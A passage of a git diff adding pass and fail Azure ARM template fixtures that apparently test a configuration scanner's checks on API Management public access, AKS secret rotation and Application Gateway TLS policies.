+        "publisherEmail": "[parameters('publisherEmail')]",
+        "publisherName": "[parameters('publisherName')]"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json b/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json
new file mode 100644
index 00000000000..5dc9e465e78
--- /dev/null
+++ b/tests/arm/checks/resource/example_APIManagementPublicAccess/fail.json
@@ -0,0 +1,103 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.20.4.51522",
+      "templateHash": "6577944355650859703"
+    }
+  },
+  "parameters": {
+    "publisherEmail": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The email address of the owner of the service"
+      }
+    },
+    "publisherName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The name of the owner of the service"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Developer",
+      "allowedValues": [
+        "Basic",
+        "Consumption",
+        "Developer",
+        "Standard",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of this API Management service"
+      }
+    },
+    "skuCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "metadata": {
+        "description": "The instance size of this API Management service."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "resources": [
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2021-08-01",
+      "name": "fail",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "administratorLogin": "jonasAdmin",
+        "version": "12.0",
+        "state": "Ready",
+        "fullyQualifiedDomainName": "jonas.database.windows.net",
+        "privateEndpointConnections": [],
+        "minimalTlsVersion": "None",
+        "restrictOutboundNetworkAccess": "Disabled"
+
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      }
+    },
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2021-08-01",
+      "name": "fail2",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "administratorLogin": "jonasAdmin",
+        "version": "12.0",
+        "state": "Ready",
+        "fullyQualifiedDomainName": "jonas.database.windows.net",
+        "privateEndpointConnections": [],
+        "minimalTlsVersion": "None",
+        "publicNetworkAccess": "Enabled",
+        "restrictOutboundNetworkAccess": "Disabled"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json b/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json
new file mode 100644
index 00000000000..1c2d7b09091
--- /dev/null
+++ b/tests/arm/checks/resource/example_APIManagementPublicAccess/pass.json
@@ -0,0 +1,81 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "metadata": {
+    "_generator": {
+      "name": "bicep",
+      "version": "0.20.4.51522",
+      "templateHash": "6577944355650859703"
+    }
+  },
+  "parameters": {
+    "publisherEmail": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The email address of the owner of the service"
+      }
+    },
+    "publisherName": {
+      "type": "string",
+      "minLength": 1,
+      "metadata": {
+        "description": "The name of the owner of the service"
+      }
+    },
+    "sku": {
+      "type": "string",
+      "defaultValue": "Developer",
+      "allowedValues": [
+        "Basic",
+        "Consumption",
+        "Developer",
+        "Standard",
+        "Premium"
+      ],
+      "metadata": {
+        "description": "The pricing tier of this API Management service"
+      }
+    },
+    "skuCount": {
+      "type": "int",
+      "defaultValue": 1,
+      "metadata": {
+        "description": "The instance size of this API Management service."
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "resources": [
+
+    {
+      "type": "Microsoft.ApiManagement/service",
+      "apiVersion": "2021-08-01",
+      "name": "pass",
+      "location": "[parameters('location')]",
+      "sku": {
+        "name": "[parameters('sku')]",
+        "capacity": "[parameters('skuCount')]"
+      },
+      "properties": {
+        "administratorLogin": "jonasAdmin",
+        "version": "12.0",
+        "state": "Ready",
+        "fullyQualifiedDomainName": "jonas.database.windows.net",
+        "privateEndpointConnections": [],
+        "minimalTlsVersion": "None",
+        "publicNetworkAccess": "Disabled",
+        "restrictOutboundNetworkAccess": "Disabled"
+      },
+      "identity": {
+        "type": "SystemAssigned"
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json
new file mode 100644
index 00000000000..f3a932c8fca
--- /dev/null
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail.json
@@ -0,0 +1,51 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "aksResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "AKS Cluster Resource ID"
+      }
+    },
+    "aksResourceLocation": {
+      "type": "string",
+      "metadata": {
+        "description": "Location of the AKS resource e.g. \"East US\""
+      }
+    },
+    "aksResourceTagValues": {
+      "type": "object",
+      "metadata": {
+        "description": "Existing all tags on AKS Cluster Resource"
+      }
+    },
+    "workspaceResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "Azure Monitor Log Analytics Resource ID"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "fail",
+      "type": "Microsoft.ContainerService/managedClusters",
+      "location": "[parameters('aksResourceLocation')]",
+      "tags": "[parameters('aksResourceTagValues')]",
+      "apiVersion": "2018-03-31",
+      "properties": {
+        "mode": "Incremental",
+        "id": "[parameters('aksResourceId')]",
+        "addonProfiles": {
+          "omsagent": {
+            "enabled": true,
+            "config": {
+              "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+            }
+          }
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json
new file mode 100644
index 00000000000..95dfac7b97d
--- /dev/null
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/fail1.json
@@ -0,0 +1,57 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "aksResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "AKS Cluster Resource ID"
+      }
+    },
+    "aksResourceLocation": {
+      "type": "string",
+      "metadata": {
+        "description": "Location of the AKS resource e.g. \"East US\""
+      }
+    },
+    "aksResourceTagValues": {
+      "type": "object",
+      "metadata": {
+        "description": "Existing all tags on AKS Cluster Resource"
+      }
+    },
+    "workspaceResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "Azure Monitor Log Analytics Resource ID"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "fail1",
+      "type": "Microsoft.ContainerService/managedClusters",
+      "location": "[parameters('aksResourceLocation')]",
+      "tags": "[parameters('aksResourceTagValues')]",
+      "apiVersion": "2018-03-31",
+      "properties": {
+        "mode": "Incremental",
+        "id": "[parameters('aksResourceId')]",
+        "addonProfiles": {
+          "omsagent": {
+            "enabled": true,
+            "config": {
+              "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+            }
+          },
+          "azureKeyvaultSecretsProvider": {
+         "enabled": true,
+          "config": {
+          "enableSecretRotation": false
+        }
+      }
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json b/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json
new file mode 100644
index 00000000000..30c585cec84
--- /dev/null
+++ b/tests/arm/checks/resource/example_AkSSecretStoreRotation/pass.json
@@ -0,0 +1,57 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2015-01-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "aksResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "AKS Cluster Resource ID"
+      }
+    },
+    "aksResourceLocation": {
+      "type": "string",
+      "metadata": {
+        "description": "Location of the AKS resource e.g. \"East US\""
+      }
+    },
+    "aksResourceTagValues": {
+      "type": "object",
+      "metadata": {
+        "description": "Existing all tags on AKS Cluster Resource"
+      }
+    },
+    "workspaceResourceId": {
+      "type": "string",
+      "metadata": {
+        "description": "Azure Monitor Log Analytics Resource ID"
+      }
+    }
+  },
+  "resources": [
+    {
+      "name": "pass",
+      "type": "Microsoft.ContainerService/managedClusters",
+      "location": "[parameters('aksResourceLocation')]",
+      "tags": "[parameters('aksResourceTagValues')]",
+      "apiVersion": "2018-03-31",
+      "properties": {
+        "mode": "Incremental",
+        "id": "[parameters('aksResourceId')]",
+        "addonProfiles": {
+          "omsagent": {
+            "enabled": true,
+            "config": {
+              "logAnalyticsWorkspaceResourceID": "[parameters('workspaceResourceId')]"
+            }
+          },
+          "azureKeyvaultSecretsProvider": {
+         "enabled": true,
+          "config": {
+          "enableSecretRotation": true
+        }
+      }
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
new file mode 100644
index 00000000000..9bdb234f4fd
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/empty_sslPolicy_fail1.json
@@ -0,0 +1,226 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddress1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 1"
+      }
+    },
+    "backendIpAddress2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 2"
+      }
+    },
+    "certData": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Base-64 encoded form of the .pfx file"
+      }
+    },
+    "certPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for .pfx certificate"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork1",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
+      "apiVersion": "2021-02-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "defoult",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "empty_sslPolicy_fail1",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "sslCertificates": [
+          {
+            "name": "appGatewaySslCert",
+            "properties": {
+              "data": "[parameters('certData')]",
+              "password": "[parameters('certPassword')]"
+            }
+          }
+        ],
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort",
+            "properties": {
+              "Port": 443
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPool",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddress1')]"
+                },
+                {
+                  "IpAddress": "[parameters('backendIpAddress2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]"
+              },
+              "Protocol": "Https",
+              "SslCertificate": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]"
+              }
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "Basic",
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              }
+            }
+          }
+        ],
+        "sslPolicy": {
+          "disabledSslProtocols": "TLSv1_0"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json
new file mode 100644
index 00000000000..f30451083f4
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_fail3.json
@@ -0,0 +1,227 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddress1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 1"
+      }
+    },
+    "backendIpAddress2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 2"
+      }
+    },
+    "certData": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Base-64 encoded form of the .pfx file"
+      }
+    },
+    "certPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for .pfx certificate"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
+      "apiVersion": "2021-02-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "defoult",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "with_policyName_fail3",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "sslCertificates": [
+          {
+            "name": "appGatewaySslCert",
+            "properties": {
+              "data": "[parameters('certData')]",
+              "password": "[parameters('certPassword')]"
+            }
+          }
+        ],
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort",
+            "properties": {
+              "Port": 443
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPool",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddress1')]"
+                },
+                {
+                  "IpAddress": "[parameters('backendIpAddress2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]"
+              },
+              "Protocol": "Https",
+              "SslCertificate": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]"
+              }
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "Basic",
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              }
+            }
+          }
+        ],
+        "sslPolicy": {
+          "policyType": "Predefined",
+          "policyName": "20150501"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json
new file mode 100644
index 00000000000..e7ac9fa7562
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_policyName_pass1.json
@@ -0,0 +1,227 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddress1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 1"
+      }
+    },
+    "backendIpAddress2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 2"
+      }
+    },
+    "certData": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Base-64 encoded form of the .pfx file"
+      }
+    },
+    "certPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for .pfx certificate"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
+      "apiVersion": "2021-02-01",
+      "type": "Microsoft.Network/publicIPAddresses",
+      "name": "[variables('publicIPAddressName')]",
+      "location": "[parameters('location')]",
+      "properties": {
+        "publicIPAllocationMethod": "Dynamic"
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "type": "Microsoft.Network/virtualNetworks",
+      "name": "[defoult",
+      "location": "[parameters('location')]",
+      "properties": {
+        "addressSpace": {
+          "addressPrefixes": [
+            "[parameters('addressPrefix')]"
+          ]
+        },
+        "subnets": [
+          {
+            "name": "[variables('subnetName')]",
+            "properties": {
+              "addressPrefix": "[parameters('subnetPrefix')]"
+            }
+          }
+        ]
+      }
+    },
+    {
+      "apiVersion": "2017-06-01",
+      "name": "with_policyName_pass1",
+      "type": "Microsoft.Network/applicationGateways",
+      "location": "[parameters('location')]",
+      "dependsOn": [
+        "[resourceId('Microsoft.Network/virtualNetworks/', variables('virtualNetworkName'))]",
+        "[resourceId('Microsoft.Network/publicIPAddresses/', variables('publicIPAddressName'))]"
+      ],
+      "properties": {
+        "sku": {
+          "name": "[parameters('skuName')]",
+          "tier": "Standard",
+          "capacity": "[parameters('capacity')]"
+        },
+        "sslCertificates": [
+          {
+            "name": "appGatewaySslCert",
+            "properties": {
+              "data": "[parameters('certData')]",
+              "password": "[parameters('certPassword')]"
+            }
+          }
+        ],
+        "gatewayIPConfigurations": [
+          {
+            "name": "appGatewayIpConfig",
+            "properties": {
+              "subnet": {
+                "id": "[variables('subnetRef')]"
+              }
+            }
+          }
+        ],
+        "frontendIPConfigurations": [
+          {
+            "name": "appGatewayFrontendIP",
+            "properties": {
+              "PublicIPAddress": {
+                "id": "[variables('publicIPRef')]"
+              }
+            }
+          }
+        ],
+        "frontendPorts": [
+          {
+            "name": "appGatewayFrontendPort",
+            "properties": {
+              "Port": 443
+            }
+          }
+        ],
+        "backendAddressPools": [
+          {
+            "name": "appGatewayBackendPool",
+            "properties": {
+              "BackendAddresses": [
+                {
+                  "IpAddress": "[parameters('backendIpAddress1')]"
+                },
+                {
+                  "IpAddress": "[parameters('backendIpAddress2')]"
+                }
+              ]
+            }
+          }
+        ],
+        "backendHttpSettingsCollection": [
+          {
+            "name": "appGatewayBackendHttpSettings",
+            "properties": {
+              "Port": 80,
+              "Protocol": "Http",
+              "CookieBasedAffinity": "Disabled"
+            }
+          }
+        ],
+        "httpListeners": [
+          {
+            "name": "appGatewayHttpListener",
+            "properties": {
+              "FrontendIPConfiguration": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendIPConfigurations', variables('applicationGatewayName'), 'appGatewayFrontendIP')]"
+              },
+              "FrontendPort": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/frontendPorts', variables('applicationGatewayName'), 'appGatewayFrontendPort')]"
+              },
+              "Protocol": "Https",
+              "SslCertificate": {
+                "Id": "[resourceId('Microsoft.Network/applicationGateways/sslCertificates', variables('applicationGatewayName'), 'appGatewaySslCert')]"
+              }
+            }
+          }
+        ],
+        "requestRoutingRules": [
+          {
+            "Name": "rule1",
+            "properties": {
+              "RuleType": "Basic",
+              "httpListener": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/httpListeners', variables('applicationGatewayName'), 'appGatewayHttpListener')]"
+              },
+              "backendAddressPool": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendAddressPools', variables('applicationGatewayName'), 'appGatewayBackendPool')]"
+              },
+              "backendHttpSettings": {
+                "id": "[resourceId('Microsoft.Network/applicationGateways/backendHttpSettingsCollection', variables('applicationGatewayName'), 'appGatewayBackendHttpSettings')]"
+              }
+            }
+          }
+        ],
+        "sslPolicy": {
+          "policyType": "Predefined",
+          "policyName": "AppGwSslPolicy20220101S"
+        }
+      }
+    }
+  ]
+}
diff --git a/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json
new file mode 100644
index 00000000000..f735d773f77
--- /dev/null
+++ b/tests/arm/checks/resource/example_AppGWDefinesSecureProtocols/with_protocolversion_and_cipher_fail2.json
@@ -0,0 +1,233 @@
+{
+  "$schema": "https://schema.management.azure.com/schemas/2019-04-01/deploymentTemplate.json#",
+  "contentVersion": "1.0.0.0",
+  "parameters": {
+    "addressPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/16",
+      "metadata": {
+        "description": "Address prefix for the Virtual Network"
+      }
+    },
+    "subnetPrefix": {
+      "type": "string",
+      "defaultValue": "10.0.0.0/28",
+      "metadata": {
+        "description": "Subnet prefix"
+      }
+    },
+    "skuName": {
+      "type": "string",
+      "allowedValues": [
+        "Standard_Small",
+        "Standard_Medium",
+        "Standard_Large"
+      ],
+      "defaultValue": "Standard_Medium",
+      "metadata": {
+        "description": "Sku Name"
+      }
+    },
+    "capacity": {
+      "type": "int",
+      "defaultValue": 2,
+      "metadata": {
+        "description": "Number of instances"
+      }
+    },
+    "backendIpAddress1": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 1"
+      }
+    },
+    "backendIpAddress2": {
+      "type": "string",
+      "metadata": {
+        "description": "IP Address for Backend Server 2"
+      }
+    },
+    "certData": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Base-64 encoded form of the .pfx file"
+      }
+    },
+    "certPassword": {
+      "type": "securestring",
+      "metadata": {
+        "description": "Password for .pfx certificate"
+      }
+    },
+    "location": {
+      "type": "string",
+      "defaultValue": "[resourceGroup().location]",
+      "metadata": {
+        "description": "Location for all resources."
+      }
+    }
+  },
+  "variables": {
+    "applicationGatewayName": "applicationGateway1",
+    "publicIPAddressName": "publicIp1",
+    "virtualNetworkName": "virtualNetwork1",
+    "subnetName": "appGatewaySubnet",
+    "subnetRef": "[resourceId('Microsoft.Network/virtualNetworks/subnets', variables('virtualNetworkName'), variables('subnetName'))]",
+    "publicIPRef": "[resourceId('Microsoft.Network/publicIPAddresses',variables('publicIPAddressName'))]"
+  },
+  "resources": [
+    {
